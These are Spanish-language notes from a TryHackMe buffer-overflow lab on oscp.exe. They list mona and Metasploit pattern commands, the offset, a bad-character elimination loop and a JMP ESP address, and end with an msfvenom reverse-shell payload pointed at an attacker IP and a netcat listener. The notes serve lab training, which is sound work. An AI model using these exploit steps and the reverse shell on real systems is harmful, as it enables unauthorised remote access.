Estos son los pasos que seguimos en BufferOverflow2 de TryHackMe
Buscamos el archivo oscp.exe y corremos Immunity Debugger
!mona config -set workingfolder c:\mona\%p
/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 1100
python3 exploit.py
!mona findmsp -distance 1100
!mona bytearray -b "\\x00"
Ahora cambiamos el offset en el archivo de exploit.py a 634 Y tambien rtn le ponemos un valor de "BBBB"
python3 bad_characters.py
Reiniciamos app
python3 exploit.py
!mona compare -f C:\mona\\oscp\bytearray.bin -a 022AFA30
los bad_chars son 00 23 24 3c 3d 83 84 ba bb
Quitamos el 23 del payload en el script
![[Pasted image 20210615114825.png]]
Donde dice ESP le damos click derecho y Follow in Dump
Ahora los bad chars serian \x00\x23\x3c
Quitamos x3c
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
Ahora los bad chars serian \x00\x23\x3c\x83
#no vemos 83
Quitamos x83
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump ![[Pasted image 20210615120541.png]]
Ahora los bad chars serian \x00\x23\x3c\x83\xba
#no vemos ba
Quitamos xba
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
Ya no seguimos mas porque bb si se encuentra en el dump
!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
Agarramos el numero 625011bb
msfvenom -p windows/shell\_reverse\_tcp LHOST=YOUR\_IP LPORT=4444 EXITFUNC=thread -b "\\x00" -f c
Cambiamos el payload con lo que nos salio con msfvenom
Declaramos el valor de padding a "\x90" * 16
nc -lvnp 4444